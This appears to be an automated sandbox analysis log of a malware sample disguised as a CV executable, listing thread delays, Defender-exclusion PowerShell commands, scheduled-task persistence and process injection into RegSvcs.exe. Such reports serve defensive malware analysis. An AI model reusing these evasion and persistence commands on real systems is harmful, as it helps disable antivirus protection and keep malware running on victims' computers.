Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594240	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598904
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598345
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596434
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594437

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5704	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8207	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 665	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8242	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1542
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8310

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe TID: 764	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7336	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7404	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7328	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe TID: 7512	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594240	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598904
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598345
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596434
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594437

Source: RegSvcs.exe, 0000000B.00000002.3285264129.0000000001336000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|
Source: Kayla Dennis CV.exe, 00000000.00000002.2141784230.0000000007C50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000i
Source: RegSvcs.exe, 00000011.00000002.3286353518.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 17_2_0563CE20 LdrInitializeThunk,

17_2_0563CE20

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe"
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe"
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 424000	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FF1008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 424000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9AF008	Jump to behavior

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

